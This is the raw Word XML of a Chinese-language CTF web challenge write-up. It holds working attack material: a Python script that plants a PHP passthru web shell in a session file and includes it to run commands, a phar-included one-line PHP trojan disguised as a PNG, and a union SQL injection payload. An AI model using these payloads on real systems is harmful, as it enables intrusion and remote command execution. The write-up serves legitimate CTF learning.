          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，于是我们需要找到一个字符比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1337</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大的数字也就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utf-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码的转换安全问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776D3597" w14:textId="5CAF76A2" w:rsidR="00D33ADA" w:rsidRDefault="00D33ADA" w:rsidP="00D33ADA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67AE6C9B" wp14:editId="35035A64">
            <wp:extent cx="5274310" cy="28244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098E" w14:textId="1172B0D5" w:rsidR="00D33ADA" w:rsidRDefault="00D33ADA" w:rsidP="00D33ADA">
      <w:r w:rsidRPr="00D33ADA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着我们在这个网站搜索大于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33ADA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> thousand </w:t>
      </w:r>
      <w:r w:rsidRPr="00D33ADA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的单个字符，就可以购买第四只独角兽了</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33ADA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:https://www.compart.com/en/unicode/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F6A0AF" w14:textId="6DB7E2D7" w:rsidR="00D33ADA" w:rsidRDefault="00D33ADA" w:rsidP="00D33ADA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49614CB4" wp14:editId="694A980C">
            <wp:extent cx="5274310" cy="2444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BA17" w14:textId="397454D7" w:rsidR="00D33ADA" w:rsidRDefault="00D33ADA" w:rsidP="00D33ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到它代表的数值是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F90583C" w14:textId="73E1D34E" w:rsidR="00D33ADA" w:rsidRDefault="00D33ADA" w:rsidP="00D33ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utf-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0xE1 0x8D 0xBC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4286542E" w14:textId="3EE79F89" w:rsidR="00D33ADA" w:rsidRDefault="00D33ADA" w:rsidP="00D33ADA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%E1%8D%BC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，输入就可以购买</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E02608" w14:textId="0DD45E75" w:rsidR="00D33ADA" w:rsidRDefault="00D33ADA" w:rsidP="00D33ADA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C5101E3" wp14:editId="1AF6EC4F">
            <wp:extent cx="5274310" cy="4276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41F" w14:textId="5589E0D7" w:rsidR="00D33ADA" w:rsidRDefault="00D33ADA" w:rsidP="00D33ADA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后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再解码一次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25838A26" w14:textId="393534E6" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00D33ADA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06308559" wp14:editId="0E7853D8">
            <wp:extent cx="3917019" cy="2202371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3492" w14:textId="54308351" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Safe_include</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2D0FB4" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t>exp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C0530A" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t>```python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283EA0FE" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t>#!/usr/bin/env python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B2FB95" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t># coding: utf-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6A254C" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678"/>
    <w:p w14:paraId="0925A7DC" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t>from time import sleep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A54ED5" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CE05CA" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678"/>
    <w:p w14:paraId="7EC0EA00" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t>url = 'http://127.0.0.1:8080'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DDF71D" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678"/>
    <w:p w14:paraId="635DE9C7" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678"/>
    <w:p w14:paraId="24DE53C2" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t>s = requests.session()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003FF280" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678"/>
    <w:p w14:paraId="3046D4BE" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t>def execute(cmd):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285C585D" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t xml:space="preserve">    params = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B6B9C1" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t xml:space="preserve">        'file': '&lt;?php passthru($_POST["cmd"]); ?&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72011660" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC4450E" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t xml:space="preserve">    r = s.get(url, params=params)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A99FE62" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t xml:space="preserve">    params['file'] = '/tmp/sess_' + r.cookies['PHPSESSID']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C0B657" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678"/>
    <w:p w14:paraId="3C1FFF0C" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t xml:space="preserve">    r = s.post(url, params=params, data={'cmd': cmd})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3288483A" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t xml:space="preserve">    return r.text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31479CE2" w14:textId="77777777" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678"/>
    <w:p w14:paraId="642AADD0" w14:textId="41C1C770" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:t>print execute('cat /flag')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420CDC38" w14:textId="3D03B934" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E96678">
        <w:t>PHPBestLanguage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E4E352" w14:textId="723E11B5" w:rsidR="00BE25A7" w:rsidRPr="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审计</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要传入</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ac</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$fn</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个参数，且包含的文件名即为去除空格后</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$fn</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值，要输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，还要满足传入的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ac</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值与包含的文件中内容相等，想到利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php://input</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪协议。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F42D6E8" w14:textId="4456DCEF" w:rsidR="00E96678" w:rsidRDefault="00E96678" w:rsidP="00E96678">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D99E7B6" wp14:editId="745B26AD">
            <wp:extent cx="4884843" cy="385605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A7BF" w14:textId="7F33859E" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00E96678">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7699ED70" w14:textId="08558A2B" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00E96678">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F03D5B3" wp14:editId="644D662C">
            <wp:extent cx="5274310" cy="20135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417A" w14:textId="5F83718B" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t>allery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A7D748" w14:textId="19B2CB00" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:r>
        <w:t>随便上传一个文件抓包发现</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>里有个</w:t>
      </w:r>
      <w:r>
        <w:t>hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B516CE2" w14:textId="77777777" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:r>
        <w:t>hint=cGxlYXNlIHJlYWQgcmVjZW50IHBhcGVycyBhYm91dCBwaGFy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCACF3A" w14:textId="77777777" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7"/>
    <w:p w14:paraId="787CB597" w14:textId="77777777" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解码得到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B227266" w14:textId="2DFA0DC3" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:r>
        <w:t>please read recent papers about phar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEECFDF" w14:textId="77777777" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7"/>
    <w:p w14:paraId="4BD33A56" w14:textId="20A99CA5" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:r>
        <w:t>既然是</w:t>
      </w:r>
      <w:r>
        <w:t>phar</w:t>
      </w:r>
      <w:r>
        <w:t>那可能是远程文件包含了，可是我没有办法知道上传文件的路径，然后扫了一遍目录发现有两个可以正常访问的路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EB1885" w14:textId="157C3BC8" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66459F70" wp14:editId="52A816B7">
            <wp:extent cx="4502150" cy="5651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2B30" w14:textId="07902F2C" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后我在</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/index.php/login/</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE25A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面看了一下，发现在这个页面上传文件之后可以查看图像，从而知道路径，如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416E50C0" w14:textId="6D49DB69" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidRPr="0053160F">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://49.4.68.67:86/?act=get&amp;pic=/var/www/html/sandbox/b1fde77fa365ca152d1639208fc19d3c/4a47a0db6e60853dedfcfdf08a5ca249.png</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22BE03D6" w14:textId="0050862B" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里上传图片文件，而且提示我们可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>phar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪协议，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议等在做这类题时也是常用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。然后我们现在写一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的马，然后压缩成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的后缀，上传之后访问该图片，利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>phar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议包含一句话木马，这里。。。直接访问马就出现了加密过的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后解密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C37CE27" w14:textId="4F3526E9" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B7485CF" wp14:editId="1394D17B">
            <wp:extent cx="5274310" cy="1694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A092" w14:textId="158A0718" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在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解码得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3EE547" w14:textId="0CD58B05" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>asy_web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7742FD9A" w14:textId="627B41D8" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="003410D6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://www.bubuko.com/infodetail-3633612.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D99D5AF" w14:textId="444B5C7B" w:rsidR="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>asy_tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A27B892" w14:textId="1772222D" w:rsidR="00BE25A7" w:rsidRDefault="00873E0D" w:rsidP="00BE25A7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很简单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1095CFCC" w14:textId="6C19F8D1" w:rsidR="00873E0D" w:rsidRDefault="00873E0D" w:rsidP="00873E0D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>asy_sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09827234" w14:textId="77777777" w:rsidR="00873E0D" w:rsidRDefault="00873E0D" w:rsidP="00873E0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>联合注入即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C63D8A1" w14:textId="77777777" w:rsidR="00873E0D" w:rsidRDefault="00873E0D" w:rsidP="00873E0D"/>
    <w:p w14:paraId="3B6B5AB2" w14:textId="3A8A6ADB" w:rsidR="00873E0D" w:rsidRPr="00873E0D" w:rsidRDefault="00873E0D" w:rsidP="00873E0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   -1' union select (select group_concat(flag) from flag),2,3,4 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C47109A" w14:textId="7564A134" w:rsidR="00BE25A7" w:rsidRPr="00BE25A7" w:rsidRDefault="00BE25A7" w:rsidP="00BE25A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00BE25A7" w:rsidRPr="00BE2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4318D"/>
    <w:rsid w:val="00103CDF"/>
    <w:rsid w:val="00316689"/>
    <w:rsid w:val="0054304E"/>
    <w:rsid w:val="005F1E47"/>
    <w:rsid w:val="007B1F2D"/>
    <w:rsid w:val="00873E0D"/>
    <w:rsid w:val="00BE25A7"/>
    <w:rsid w:val="00D33ADA"/>
    <w:rsid w:val="00E4318D"/>
    <w:rsid w:val="00E96678"/>
    <w:rsid w:val="00F66654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BC99"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C48DCE28-4C05-4BCF-8AF1-F1C70D04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304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304E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30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30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1E47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111.198.29.45:37935/index.php?id=%2561dmin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hyperlink" Target="http://www.bubuko.com/infodetail-3633612.htm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49.4.68.67:86/?act=get&amp;pic=/var/www/html/sandbox/b1fde77fa365ca152d1639208fc19d3c/4a47a0db6e60853dedfcfdf08a5ca249.png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4ED2-6AEB-46E3-8AC3-4459D7F6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洋翊</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>于 洋翊</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-01T07:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-01T09:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>